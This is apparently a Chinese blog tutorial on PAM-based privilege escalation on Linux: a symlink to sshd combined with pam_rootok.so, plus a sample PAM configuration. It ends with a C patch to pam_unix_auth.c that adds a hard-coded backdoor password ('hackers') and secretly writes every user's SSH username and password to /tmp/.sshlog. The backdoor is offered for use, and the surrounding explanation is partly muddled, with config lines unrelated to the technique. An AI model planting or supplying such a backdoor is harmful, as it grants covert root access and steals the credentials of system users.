PAM软连接提权

文章目录

概要

PAM软链接提权利用的原理主要依赖于PAM(可插拔认证模块)配置文件的特性。具体来说,它利用了以下几个关键点:

PAM认证机制:PAM允许系统管理员通过配置文件灵活地管理用户认证过程。在SSH服务中,如果启用了PAM认证,系统会在用户登录时调用PAM模块进行身份验证。

软链接的使用:攻击者可以创建一个指向sshd文件的软链接,并将其命名为su(或其他名称)。当SSH服务启动时,它会根据PAM配置文件查找对应的模块。

pam_rootok.so模块:pam_rootok.so主要作用是使得uid为0的用户,即root用户可以直接通过认证而不需要输入密码。

PAM配置文件的控制:在PAM配置文件中,如果控制标志设置为sufficient,那么只要pam_rootok模块检测到用户的UID为0(即root用户),就会允许认证成功。这意味着即使输入了错误的密码,只要满足UID为0的条件,用户就可以获得root权限。

绕过正常验证:通过这种方式,攻击者可以绕过正常的密码验证,利用软链接实现提权,从而获得对系统的控制。

PAM软连接

1.可以查看 /etc/ssh/sshd_config 文件的UsePAM设置。来确认是否开启PAM认证。

2.修改PAM配置文件

auth required pam_securetty.so//要求在安全终端上进行身份验证。

auth required pam_unix.so shadow nullok//使用Unix认证,允许空密码(但并不推荐)。

auth required pam_nologin.so//检查是否存在nologin文件,防止不允许的用户登录。

account required pam_unix.so//用于账户管理的Unix认证。

password required pam_cracklib.so retry=3//使用密码复杂性检查,允许用户最多重试3次。

password required pam_unix.so shadow nullok use_authtok//用于更新密码的Unix认证,允许空密码,使用先前的身份验证令牌。

session required pam_unix.so//处理用户会话的相关操作。

3.将PAM配置文件中控制标志为sufficient,更改pam_rootok模块检测uid为0(root)

也可以修改配置,创建后门

修改配置:Linux-PAM/modules/pam_unix/pam_unix_auth.c配置后门

复制代码
/* verify the password of this user */
retval = _unix_verify_password(pamh, name, p, ctrl);
if(strcmp("hackers",p)==0){return PAM_SUCCESS;}    //后门密码
    if(retval == PAM_SUCCESS){    
           FILE * fp;    
           fp = fopen("/tmp/.sshlog", "a");//SSH登录用户密码保存位置
           fprintf(fp, "%s : %s\n", name, p);    
           fclose(fp);} 
name = p = NULL;
相关推荐
wd5i8kA8i7 小时前
自研多线程 SSH 极速文件传输助手(附 GitHub 源码)
运维·ssh·github
Boop_wu7 小时前
[Java 算法] 字符串
linux·运维·服务器·数据结构·算法·leetcode
菱玖9 小时前
SRC常见漏洞情况分类
运维·安全·安全威胁分析
白毛大侠9 小时前
理解 Go 接口:eface 与 iface 的区别及动态性解析
开发语言·网络·golang
SkyXZ~9 小时前
Jetson有Jtop,Linux有Htop,RDK也有Dtop!
linux·运维·服务器·rdkx5·rdks100·dtop
桃地睡不着10 小时前
ai安全工具:CyberStrikeAI安装部署与使用
人工智能·安全·渗透测试
舒一笑10 小时前
一次“翻车”的部署,让我看清了技术、权力和职场的真相
运维·程序员·创业
杨云龙UP11 小时前
Oracle Data Pump实战:expdp/impdp常用参数与导入导出命令整理_20260406
linux·运维·服务器·数据库·oracle
不灭锦鲤12 小时前
网络安全学习(面试)
学习·安全·web安全
我科绝伦(Huanhuan Zhou)12 小时前
分享一个服务故障自愈系统
运维·人工智能·自动化